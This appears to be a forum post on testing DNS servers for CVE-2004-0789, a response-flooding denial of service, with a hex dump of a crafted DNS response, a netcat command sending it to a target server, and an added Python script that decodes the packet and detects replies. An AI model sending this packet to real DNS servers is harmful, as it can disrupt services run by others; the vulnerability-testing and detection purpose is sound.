How to test CVE-2004-0789 Multiple Vendor DNS Response Flooding Denial Of Service?
The basic Nessus test appears to be replicable by using a hex editor to create a response file (I used the Nessus google example) and then sending that data to the target DNS server via netcat:
so:
od -ah dns-response-dos.txt
0000000 ` x enq etx nul soh nul nul nul nul nul nul etx w w w
f860 8385 0100 0000 0000 0000 7703 7777
0000020 ack g o o g l e etx c o m nul nul dle nul soh
6706 6f6f 6c67 0365 6f63 006d 1000 0100
0000040
...and then:
cat dns-response-dos.txt | nc -u "target dns server" 53
`���wwwgooglecom^C
...produces a response.
Garbage data produces no response.
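
For reference, an added example that is not part of the original post: the Python below decodes the hex rows of the od dump above as a DNS message, showing that the file is a response (QR=1, RCODE 3) to a TXT question for www.google.com rather than a query, and gives a check for spotting a reply to such a datagram in captured traffic. Assumptions: od was run on a little-endian host, a reply echoes the transaction ID, and the function names are hypothetical.

```python
import struct

# Hex rows of the `od -ah` dump in the post (16-bit words).
OD_WORDS = """
f860 8385 0100 0000 0000 0000 7703 7777
6706 6f6f 6c67 0365 6f63 006d 1000 0100
"""

def od_words_to_bytes(text):
    # od -h prints host-order words; a little-endian host is assumed,
    # which agrees with the character rows of the dump (` x enq etx ...).
    return b"".join(struct.pack("<H", int(w, 16)) for w in text.split())

def parse_dns(msg):
    """Decode the header and first question; ValueError if malformed."""
    try:
        ident, flags, qd, an, ns, ar = struct.unpack("!6H", msg[:12])
        labels, pos, qtype, qclass = [], 12, None, None
        if qd:
            while msg[pos]:
                n = msg[pos]
                if n > 63 or pos + 1 + n > len(msg):
                    raise ValueError("compressed, oversized or cut label")
                labels.append(msg[pos + 1:pos + 1 + n].decode("ascii"))
                pos += 1 + n
            qtype, qclass = struct.unpack("!2H", msg[pos + 1:pos + 5])
    except (struct.error, IndexError) as exc:
        raise ValueError("truncated DNS message") from exc
    return {"id": ident, "qr": flags >> 15, "aa": (flags >> 10) & 1,
            "rd": (flags >> 8) & 1, "ra": (flags >> 7) & 1,
            "rcode": flags & 0xF, "counts": (qd, an, ns, ar),
            "qname": ".".join(labels) or None,
            "qtype": qtype, "qclass": qclass}

def answered_a_response(sent, received):
    """True when a server replied to a datagram that was itself a
    response (QR=1). Assumption: the reply echoes the transaction ID."""
    if not received:
        return False
    try:
        s, r = parse_dns(sent), parse_dns(received)
    except ValueError:
        return False
    return s["qr"] == 1 and r["qr"] == 1 and s["id"] == r["id"]

if __name__ == "__main__":
    print(parse_dns(od_words_to_bytes(OD_WORDS)))
```

A patched or unaffected server should leave `answered_a_response` false for this payload, the same outcome the post reports for garbage data.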